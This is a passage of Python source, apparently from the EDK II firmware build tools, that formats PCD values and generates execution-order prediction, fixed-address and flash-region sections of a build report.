SkuInfo = Pcd.SkuInfoList[Sku]
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
OverrideValues = Pcd.SkuOverrideValues[Sku]
DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
if DscOverride:
break
else:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
DscOverride = self.ParseStruct(OverrideFieldStruct)
if DscOverride:
break
if DscOverride:
DscMatch = True
DecMatch = False
#
# Report PCD item according to their override relationship
#
if DecMatch and InfMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
elif BuildOptionMatch:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
else:
if DscMatch:
if (Pcd.TokenCName, Key) in self.FdfPcdSet:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
else:
self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
if ModulePcdSet is None:
if IsStructure:
continue
if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
continue
if not BuildOptionMatch:
ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
for ModulePath in ModuleOverride:
ModuleDefault = ModuleOverride[ModulePath]
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
else:
Match = (ModuleDefault.strip() == PcdValue.strip())
if Match:
continue
IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
if IsByteArray:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, ModuleDefault.strip()))
if ModulePcdSet is None:
FileWrite(File, gSectionEnd)
else:
if not ReportSubType and ModulePcdSet:
FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in struct.items():
if Values[1] and Values[1].endswith('.dsc'):
HasDscOverride = True
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
if DecMatch and IsStructure:
self.PrintStructureInfo(File, Pcd.DefaultValues)
def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' '):
if not Pcd.SkuInfoList:
Value = Pcd.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x','0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues
if OverrideValues:
Keys = OverrideValues.keys()
Data = OverrideValues[Keys[0]]
Struct = Data.values()[0]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, Struct)
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
FirstPrint = True
SkuList = sorted(Pcd.SkuInfoList.keys())
for Sku in SkuList:
SkuInfo = Pcd.SkuInfoList[Sku]
SkuIdName = SkuInfo.SkuIdName
if TypeName in ('DYNHII', 'DEXHII'):
if SkuInfo.DefaultStoreDict:
DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
for DefaultStore in DefaultStoreList:
Value = SkuInfo.DefaultStoreDict[DefaultStore]
IsByteArray, ArrayList = ByteArrayForamt(Value)
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, '%s' % (Array))
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ' , TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for Key, Values in OverrideStruct.items():
if Values[1] and Values[1].endswith('.dsc'):
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in Struct.items():
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
##
# Constructor function for class PredictionReport
#
# This constructor function generates PredictionReport object for the platform.
#
# @param self: The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
if int(str(Module.AutoGenVersion), 0) >= 0x00010005:
RealEntryPoint = "_ModuleEntryPoint"
else:
RealEntryPoint = EntryPoint
if EntryPoint == "_ModuleEntryPoint":
CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "")
Match = gGlueLibEntryPoint.search(CCFlags)
if Match:
EntryPoint = Match.group(1)
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = open(SourceList, "w+")
for Item in self._SourceList:
FileWrite(TempFile, Item)
TempFile.close()
TempFile = open(GuidList, "w+")
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
TempFile.close()
try:
from Eot.Eot import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb["1B45CC0A-156A-428A-AF62-49864DA0E6E6"] = "PEI Apriori"
self._GuidsDb["FC510EE7-FFDC-11D4-BD41-0080C73C8881"] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = OffsetInfo.keys()
OffsetList.sort()
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
